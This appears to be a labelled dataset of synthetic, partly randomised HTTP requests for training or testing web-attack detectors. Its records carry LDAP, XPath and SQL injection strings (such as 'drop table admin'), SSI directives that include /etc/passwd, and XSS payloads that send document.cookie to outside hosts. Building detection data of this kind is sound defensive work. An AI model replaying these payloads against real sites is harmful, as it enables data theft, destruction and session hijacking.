X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43851
Start - Id: 38855
class: LdapInjection
GET /oatpm6hisuo/t4@LJvt70ZAfk68SutF/sdTWrts7/w0rhsbta85iesfe/toit/ZH.AKx3nRT.jpeg?cuat=e6Km60nCU4zP&eI6etcC7D_Eb=oEn&180UphtpassT=%29+%28++%7C%28++cn%3D*o+++%27brien*++++%29%28mail+++%3D*o++++%27brien*+++%29++&Qakx5tn16aen=st1 HTTP/1.0
Host: www.6qhqI3etme.org
Connection: keep-alive
Accept: video/*;q=0.2, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=54
Client-ip: 149.133.119.108
Cookie: totduzyQas2ahN6=os;IbiEs3Ddo=2537541775
Cookie2: $Version="36"
Date: Sun, 28 Dec 08 11:18:55 GMT
ETag: W/"@7Yjn8ZE2@SsNW_j"
Expect: beeepata=O503do;rmagetie
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 03 Feb 06 05:37:28 GMT
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: *
If-None-Match: "T4_zXOW8gGRpa2pA"
If-Range: "oG1PhwU3aqbAjCY"
Max-Forwards: 9898
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Ym9pbk1uZWh0MnJzdXZsZXk1dXRETjdlZXlvdG50aEJlcXdzaWNtaWRYbnU=
Range: -909693
Referer: /eoit6p/dotntped/sthtmo/i3cd.avi
TE: trailers
Trailer: Accept-Language
User-Agent: pxSe9riax (e4Agjyg7; 317lRcli7; om0m59W; v3FRc320; wCrbHgtyr8)
UA-CPU: 68000
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 9.2 www.EmfvseSe.shtml, 5.6 www.utme.png
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38855
Start - Id: 39370
class: SSI
GET /mlANInADFum/nSsmeeh/3eaiR/aMehhesiewe/lnNeyd5n2gmL5im/exEvfpLZRVSY/xeHqwinntA/nbt/sx/maaejsHykwoshr.php3?ea=Qe0s&hiaaten2cdle=7492&oyitr=eopt&htnmwa=5247&nvrrqa=%3C%21--%23email+fromhost%3D%22www.lHndddid.com%22+tohost%3D%22mailbox.mce1o.com%22+message%3D%22tIse+UeerAm+aaVRllcl+m6Sh%22+fromaddress%3D%22n4tlhe.com%22+toaddress%3D%222re.rmr.com%22+subject%3D%22ees%22+sender%3D%22te.com%22+replyto%3D%22n1yah.com%22+cc%3D%22ee%22+inreplyto%3D%22igjue+nta+ahts%22+id%3D%22Syhemail%22+--%3E&sr8=s%26e%40dhc HTTP/1.1
Host: 170.247.211.144
Connection: Ytee
Accept: */*
Accept-Charset: iso-8859-5, x-mac-chinesetrad
Accept-Encoding: compress;q=0.4, gzip, deflate, gzip;q=0.4
Accept-Language: eleeerSn-stOi2nib;q=0.8
Cache-Control: min-fresh=4374
Client-ip: 186.197.175.198
Cookie: aBljadminvxzqhtacces=nP5B
Cookie2: $Version="92"
Date: Tue, 10 Nov 09 06:12:21 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 22 Sep 06 11:31:20 GMT
If-Unmodified-Since: Sun, 01 May 05 07:58:35 CET
If-Match: "p1yHeFT9Dtrw-Mj"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 72
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 396191-323,-9
Referer: /drdwllo/otaxiot/yesht/3mx6.asmx
TE: chunked,deflate,deflate
Trailer: If-Modified-Since
User-Agent: evw4Uu http://www.ettfd.cz
UA-CPU: 68000
UA-Disp: 080,349,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39370
Start - Id: 35010
class: SSI
PUT /e5fG@Xao8vFWl/ithJnmamcxLblitgt/rB/BmdfoNdhdscript5/iZaLK5dmtx7b4/u2s0yeija0rnegu2h/dowj6aSaq4you4irre/teGSxlmUySzOiLivu.jpeg? HTTP/1.1
Content-Length: 328
Content-Language: tw,len,tco5
Content-Encoding: identity
Content-Location: /tuosae/sE6n/14pc.txt
Content-MD5: bnpBMWVrc2V3bmd0am9pZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 May 04 03:57:51 CET
Last-Modified: Tue, 11 May 04 05:08:20 GMT
Host: www.aeEyoq.be:964
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1258, cp-932, x-mac-japanese;q=0.7
Accept-Encoding: *
Accept-Language: nTrq-eM;q=0.9, otAsrshe-eYet, hsfahe-Inmi;q=0.2, RoUr6e9a-rer;q=0.0, Dn1iS9ee-Mhs7s;q=0.1
Cache-Control: min-fresh=53075
Client-ip: 161.9.74.175
Date: Wed, 28 Feb 07 23:32:54 CET
ETag: W/"qb@c5jVr@JEq0IYUA7"
If-Unmodified-Since: Tue, 09 Aug 05 10:19:16 UTC
If-Match: *
Referer: http://hoyg.gov/ieXcea.nsf
User-Agent: tec4e/6.8.2.2
UA-Color: color32
Via: tFsryH/7.0 www.ego9Iif.jpeg, ad72/2.0 www.dsrli.jpeg, 1.5 226.7.248.223
Transfer-Encoding: identity

HKoOpand7shi=7bnn&smh=t&ii6caeeOe9cn=78rcDQrueo&emnna=4feE84l&iB64s0=;tpoNvateh\fe[c&pei=e&ostchfaothy=<!--  #odbc statement   =  "select     ea3uig,   siigiKao,   ahyl7 from     enh7naoe order    by  5, 09,  0"  -->&O.H@locationZ6allW=hc(access_logt&ynhn4=ftuinoiR0u&ehzhoeseUpoEC=1&a5ebnsdhr9wr=l

End - Id: 35010
Start - Id: 47484
class: XSS
GET /G6KbVingcWLXyv/9aee7sw/MEjMDlibbAYWHselectpphp/fDzbKe/iruhQptUkG/l3H@uSlttYe0/yidlnm3ie.asp?if=oTjVgM&mdyr3flrdgertb3=8%5DprarLfies+i&haikrttH=zChrlpzecsiae&eNrocsgtsss=1032086&em0p8kvesr=261543&hoe2iot6ensa=80775&l4elnis4thy=%3Cdiv+++++style++%3D+%22+++++width%3A+++expression%28%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.dedege.com%2Fcgi-bin%2Fnsin.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B%22++++%3E&UxjLrujnocopy=Axsheoa2dlaorp&eahb1wl8w=514517777&erako1ho=++0gaan+zmr&eA4rhc=43&sb2mnhw2e=fsft5ors72a&3su7eDreznaVfa=Tthxterm-zscriptt%7Eaixhtoo3+&cashlsoeamZold=rnne1tee+rhn-wda&cdc9rfhoeet=xuhml HTTP/1.1
Host: www.mttS2eu.cz
Connection: close
Accept: video/mpeg;q=0.8, video/mpeg;q=0.3
Accept-Charset: iso-8859-2;q=0.3, iso-8859-7, iso-2022-kr, x-mac-arabic;q=0.2
Accept-Encoding: gzip;q=0.9, deflate;q=0.9, identity, compress
Accept-Language: eesc-lid;q=0.8
Cache-Control: only-if-cached
Client-ip: 66.213.204.241
Cookie: ila6et=938741532
Cookie2: $Version="25"
Date: Sat, 28 Apr 07 19:02:41 GMT
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Tue, 06 Jun 06 02:04:37 CET
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: "6ws-g8rj4ia9UoU762a"
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Mon, 18 Aug 08 20:08:52 CET
Max-Forwards: 461
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: /brSt/eeOe3asw/pttI4He/rqRdt.pl
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: azxxittE3 (dpAT9@Q3uK; oLKixdKd5E; fahs.U)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: deflate
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47484
Start - Id: 37756
class: LdapInjection
GET /3qcrey/lacfTet/cVSpdo_sct/igkaO_u1FwzNSi/eeArnynrHmf.-7UkIG8B/neork/brl7ztR/dbh.cgi?eDaeegtrf=%29++%28%7C++%28cn%3D*o+%27brien*+++%29%28mail++%3D*o+%27brien*+%29++&nEkttxatmn=ssock_streamaOyvtat1ar%3C&5imi=tl3l&tzqotror3cuo2s=Lmst HTTP/1.1
Host: 28.207.196.193
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: isiri-3342;q=0.6, iso-8859-3, iso-8859-6, hz-gb-2312, windows-874;q=0.0
Accept-Encoding: identity;q=0.7, gzip;q=0.1, identity, identity, deflate
Accept-Language: oimtwjn-Uhaswec
Cache-Control: no-transform
Client-ip: 18.137.252.198
Cookie: nn2elo==dcsc;ilbtol=it;isnzx=<7&T%pelogtaLyryreplacea;ottn=chuagwideozaaidn
Cookie2: $Version="70"
Date: Wed, 19 Jan 05 22:04:12 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 0.5
Pragma: no-cache
Authorization: Digest realm
Range: 6-
Referer: /reuts/Yydvo3/slsnl1t/escnlSO/hmedo.txt
TE: chunked
Trailer: Proxy-Authorization
User-Agent: ol0oeulL/8.1.5.6
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 633x6724
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37756
Start - Id: 50000
class: XPathInjection
POST /5vd38/--ELT3fY_selectgWX4/mB/Ln6beRimunqiadu5xe/ncY0rcp/torfoch/srsur/bUAx0J/cnteiikdsU/pmM5cm2G6VaIK1vDw3.cfm? HTTP/1.0
Content-Length: 256
Content-Language: th6tq5n,6r3usr,S
Content-Encoding: compress
Content-Location: http://4edo.st/bpiSdEsi.dll
Content-MD5: cmVJZHQ5b2xJYWZpdHNrdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jul 08 17:56:02 GMT
Last-Modified: Sun, 16 Mar 08 24:15:54 UTC
Host: www.egiite.com
Connection: close
Accept: video/quicktime, text/html;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 177.9.17.154
Cookie: jTpVKLyJR=Udcatt4icqn;8qoYtto=tsfi;siw= olw;rLXhaving_chavingaetcI=72
Cookie2: $Version="6"
Date: Mon, 29 Nov 04 14:42:39 CET
ETag: "VANgo6eBbSOhCg1fn5K"
Expect: ceuhtats
From: etjd@onalE.be
If-Modified-Since: Mon, 11 Oct 04 22:53:33 GMT
If-Unmodified-Since: Sun, 01 Jul 07 13:18:09 GMT
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Tue, 01 Aug 06 22:09:57 CET
Max-Forwards: 9
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Authorization: RHari eevst=CIshe
Range: 1-0902
Referer: /eorrowns/amethoyn/ryatG.nsf
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: eDt5'    or cnlga/airh/child::node()[processing-instruction()=497]  or    'rteltR' =  '
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Win98
UA-Pixels: 957x1532
Via: 3.6 192.109.251.159, 7.3 176.244.104.209:1108
Transfer-Encoding: compress
Warning: 398 166.91.243.88:2399 "rnedr7tea5aeoubom" "Mon, 21 Jun 04 14:41:58 GMT"
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

umailKxvIJ=ss@i5fZ7t7TI&delete2QtCkphp=qaff&cqci=35920468&i3=nnldsoc%&mtr8q=7e&trieifgbwcrihid=nlisaualiru&rhlrS9t4o59=9656975&aorevmtius=06&yrnefiTiug1ttO=metapt&xp_&Fv=s@dYFPJ&LHehlsr=in i= |&h8j6hnlaruuos=19&ewduc=726&tye1e=n9G&Nw4dwobanE=d6

End - Id: 50000
Start - Id: 41461
class: SqlInjection
PUT /iiuelelts9naeP0ma/poienoJgnb/document5b3i0ocoARH1j@/tmjEb/sAciGIf.asp? HTTP/1.0
Content-Length: 207
Content-Language: d,seheic6o,hq
Content-Encoding: compress
Content-Location: /m5erdtSh/dkopVf2e/isherp1/tso2.jpg
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 04 02:31:15 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 213.53.100.172
Connection: la2uNyes
Accept: */*;q=0.0
Accept-Charset: windows-1257, iso-8859-8-i, ks_c_5601-1987;q=0.8
Accept-Encoding: compress, compress, identity, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 131.147.44.241
Cookie: Udivx9lPEFyR=1377;2gtbaraegactl=74;d2onsd1=iesodf9aeI:~3iood;oathqe=wqTfS;dsorsaeataye2e=4
Cookie2: $Version="83"
Date: Sat, 29 May 04 17:03:02 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Thu, 04 Aug 05 03:44:54 UTC
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /oTmrsre/oiaoiTw/riea7.html
TE: trailers,deflate;q=0.4,trailers
Trailer: If-None-Match
User-Agent: hnrEgtac (c6ompw; qPu1Xhj)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: gzip
Upgrade: ilbd/6.7, 6Adhh/9.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 58494263070
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eeeat7di=7&pgobaLAhzIeis6=- m h&egbxoe3t=2284&nnEs=fzoTmcDJxY&al2oaxNew=esock_streamnxWiW$osecie7&ep3mIgt=761260&vsBo7u=ljcehpi9caewinnt-E&.MI7nc=';     drop   table admin&netq4wmomeaBcr=99&37hhs=63252

End - Id: 41461
Start - Id: 35289
class: SqlInjection
GET /aa/titIjeoe8hz/6u/e5myEm3/thw/rotb6nqfob.cfm?Etoznhoathtsi=Lentienar&qeedpel6l=6&p0hrnioec=httpsimgn4m7ny&srrlbintsaodn=OR+++++96%3D96&mI7=435&qacRnohseltitg=ed2b&tg=3776&0RcS=nO&t1inry7cmtse=88&uo=9nSteuilmehb HTTP/1.1
Host: 189.240.176.185
Connection: d2dl
Accept: image/*, application/*;q=0.0, image/jpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.0, compress, compress;q=0.9, compress;q=0.8
Accept-Language: *;q=0.6
Cache-Control: u=yoilA
Client-ip: 57.47.12.14
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Sun, 24 Jun 07 22:03:40 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: s5uy73o@rSauxkH.com
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: "J-pW8L9HG2GJ1E_GI7NL"
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Fri, 27 Feb 09 22:12:19 CET
Max-Forwards: 0346
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="pYar"
Authorization: Digest username="w7rljnn"
Range: 930-456,2355-
Referer: http://ns9eea.be/gwhrta/EaignNrb.wav
TE: deflate,gzip;q=0.2
Trailer: Warning
User-Agent: as0pt0h (bZ@2Nq; wO7JxK9; sNjdXR6Lsl; 7obJfRs3qK; sw5-8hZ8)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: HTTP/4.5 49.34.229.149
Transfer-Encoding: compress
Upgrade: efPaoi/9.4, euaos/9.4, toa/5.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35289
Start - Id: 35401
class: SqlInjection
GET /jAtudat2tAiadIocg/i.zbIZStvoa7C3C/shR8paSX7qf/bEtezimeotqgtei/n1otveoWssrtmbfgny/eewuoioo5rde7/dPZ6dcb/jaiCsitEamieinp/YsLltfweeiUia8/hootmiulalnr9pwqsu7p/aduSnias.php3?re0i=%28cmdiE9AnclrtuE&hkda=aDT7oz9VtIZV&ALDmVscriptz.lnUp=171&nyumoliup6sep=2724984&Spto5s7rRhn=3esvg&is1rhc2=bemr8ymU%27+++%29%3B++DEL%2F**%2FETE++FROM+++users++++WHERE+upper%28username%29++++%3D++upper%28+++%27admin&sgJ=4&streGt=pMKRtZo2mLJ HTTP/1.0
Host: 200.37.116.66:95991
Connection: suiosotz
Accept: application/rtf;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.3, windows-1252;q=0.8
Accept-Encoding: 
Accept-Language: 6eo-soe, i-a;q=0.7, d-s1ist, Ntum-xourn, mzt-anheoe;q=0.4
Cache-Control: stTr1i='C'
Client-ip: 27.88.177.131
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="091"
Date: Sun, 11 Oct 09 04:21:06 CET
ETag: "w.bssa@znOLYSv9"
Expect: aeuor=cxtirylr
From: attRtlnt@3bmi3fqyko.fr
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: "xRi8ZP-96e1q4YBs8jZ"
If-Range: *
Max-Forwards: 766
MIME-Version: 4.3
Pragma: o='qer'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Basic aUEzb3BhcjpUZWN0M2U=
Range: -67
Referer: /iEevgo.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (compatible; Konqueror/5.7; Win98; g7b7a; pd8hrryl)
UA-CPU: 68000
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 9.4 www.aee3.css, soDen/3.5 www.mtthra.png
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: to9t/2.8, 4Egiin/1.2, doaAoo/6.7, Tuann/2.6
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35401
Start - Id: 49881
class: XPathInjection
GET /s4iweitnHtrsr9iahs4a/hockg4imt/rtO/d-pJSOs3.tiwDaP/afE7fSLdSxqe/upMKqZ.V_XebzGQN0R/npdKiyzJ/nheine8ey8S/1Ibh/rntc/eaasEtminyGdtboy5u/dXnl1hsaire.php?ehEdrncwrechni=ore&SgRUi=dTi&7ds7rjeuV=b+%2F3a6nL&4perlr58=tuPfymHoj.g2&HUZCaselectJnodeEX=61135+++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++80371%3D&5svrno7=aPpNhMM&tbqn=rjeytz%3C5%26OtheR%3Eame%3E HTTP/1.1
Host: www.nk0ohyni.ch
Connection: tnafh
Accept: audio/*;q=0.4
Accept-Charset: hz-gb-2312, shift_jis, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 161.161.216.27
Cookie: abthytxOt=6;ti1t8rnvtzaz=arftThe1ts;uaegd=uaei;ndeqdGntxqe=9rha0nnipAsl;8efrGag=dedhrrtjgeiT4E5nm
Cookie2: $Version="5"
Date: Mon, 21 May 07 23:56:14 UTC
ETag: W/"hH71xME7IfcK@fLcorf4"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 24 Jan 10 22:11:14 CET
If-Unmodified-Since: Wed, 06 Dec 06 06:29:44 UTC
If-Match: *
If-None-Match: "uZlf6YTitnEeNbpcG3e"
If-Range: Sun, 06 Aug 06 02:37:20 CET
Max-Forwards: 8
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /Rnu9ein/inrjtedq/aeised/uufe/hsalA.jpeg
TE: trailers,trailers,deflate;q=0.4
Trailer: Cache-Control
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 5.8; ta-ft; rv:0.7.7) Gecko/20286665
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: FTP/6.5 35.169.92.198, FTP/6.1 www.0tu3.shtml
Transfer-Encoding: compress
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49881
Start - Id: 39836
class: SSI
GET /u0NTZYY/rr1M2elCl/7tnugedimerlheex/an1edngeyiucnooi/liEezvfsnd0ztsx/akf0oaznyndEflaooni/RytEouonscXaxralhe/ilwu012yhetest/ewcD4RXXSzfGzwnU/Aqx1MLL0THQk5Z_/2tIWA0.html?utwreomn7Pt=9eaanNa&scahwe=ddmhthnnhtdoEruHul&sudrjhNgp5ccmhX=sn6Ml&cEefitnafken=32&8rpswefsg3ratr7=lBy2.&tl=eIEL-tX%40cRd&dUesobvt1t=ddocumentachrsoiaio&9Ttues0thp37o=uTtevalst&st=hvc_jGJ3T&T4cin=45&Iptzte8=ecn9u1window.opengroup+by%27a&cofagrtQend5=ad+sU&bqce4pt=%3C%21--+++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&0dumsroTfidwa0=wNK0l HTTP/1.0
Host: www.am8uarHaos.org:41
Connection: keep-alive
Accept: text/html
Accept-Charset: cp-932;q=0.9, us-ascii, windows-874;q=0.3
Accept-Language: hfpqot-asao;q=0.4
Cache-Control: max-age=2282
Date: Sun, 26 Jun 05 22:24:47 CET
ETag: W/"rGMbb322bfhuAgkEMq"
If-None-Match: "2BE25GDBfUguYt-s1Qb"
If-Range: *
Max-Forwards: 0344
Referer: /esrlzu/betaeh/aepaspb.php
User-Agent: Mozilla/0.4 (compatible; este8nhmhx; Linux i586; aortE)
UA-Color: color16
UA-Pixels: 814x196
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39836
Start - Id: 48042
class: XSS
GET /BE2/ups_am6I/nL@e/flwe/odrDRzt1EfJ.s/F7WW-iha/ChMcH-/SvbscriptexecrgJtu/7bcbLmqnonueO7teyslw/lFxZWYN5W/hB._@B.es98.jpg?brtpdw=321&v7psFsi=tiexedivYAlex%7C&st7syldclamEfTn=%3C%21--+--+--%3E%3Cscript+%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.silenaol.com%2Fcgi-bin%2Fsiesen.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E&fn=2527&k2IdqD=7&ota1ue=qmprx HTTP/1.1
Host: www.o1e2oo.com:80
Connection: nlttioan
Accept: audio/*;q=0.7, image/*;q=0.9, image/png;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: d5teeT=nn
Client-ip: 57.224.52.157
Cookie: e1hte=lLjJuojWhJt;te0pnl=iLzRO9;mdn=nupimD;fBfnetu4=0912933;satose7P=oe
Cookie2: $Version="7"
Date: Sat, 09 Jul 05 18:00:08 CET
ETag: "0ylSt0lEOmXK8dtOiEj"
Expect: sntr=swesei6
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Jul 05 15:49:05 CET
If-Unmodified-Since: Sun, 26 Apr 09 09:30:08 CET
If-Match: "L.-Y4av_4D01@iUUh"
If-None-Match: "Z00QoopKZUMcdtgE_"
If-Range: Sat, 06 Aug 05 23:27:26 UTC
Max-Forwards: 5
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: NTLM MGJzZ2lqbWllcmVBeThudGVhZG93d2E5cmxpeXZtZW5lT3dzOG1jc2FhZXNy
Range: -2,4927-,7358-69
Referer: http://t62posr6.net/UseAo1/8rss/apeuaely/e66dr.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 9.2; te-pE; rv:0.9.0) Gecko/15795607
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 965x958
Via: 3.9 www.oad1daj.gif, FTP/1.0 222.24.197.202:0, 9.7 248.159.203.152
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48042
Start - Id: 39857
class: SSI
POST /aQtaheyemoerttttq2zz/ng5nsttzh/m4hXcVgQDVrKzxJxhVw.png? HTTP/1.0
Content-Length: 204
Content-Language: 001le,jtvrh,s
Content-Encoding: gzip
Content-Location: /wmee.tar
Content-MD5: aWVudDhueml0ZmtmdGN0bQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 24 Jan 05 12:32:50 GMT
Host: www.hmhc5eo.biz
Connection: psdeoel
Accept: */*;q=0.7
Accept-Charset: macintosh;q=0.5, x-mac-turkish;q=0.1, windows-1255
Accept-Encoding: *
Accept-Language: rct-l5eBie;q=0.2, s6a-d37te;q=0.1, Fd-i, Oeakoo3-535Qie, ts-er
Cache-Control: min-fresh=074
Client-ip: 207.175.239.116
Cookie: 2semiwosl=mautsdca;DurmUccu7=idTAdeaeTiTmx;null@BsystemWreplace=<!-- #include  virtual="/etc/httpd/httpd.conf"     -->;kltincfWegn5is=3shSrm?nFRilike\ qH;vesOOr6iadef6=ciy
Cookie2: $Version="5"
Date: Mon, 13 Aug 07 20:48:52 CET
ETag: W/"ObvsAtI5axOhRDw"
Expect: 100-continue
If-Modified-Since: Thu, 05 Feb 04 12:56:50 GMT
If-Unmodified-Since: Sat, 13 Jun 09 15:39:53 CET
If-Match: "Q5xXgJ-bb4w8lb6"
If-None-Match: *
If-Range: *
Max-Forwards: 00
Pragma: ht6=errpe8en
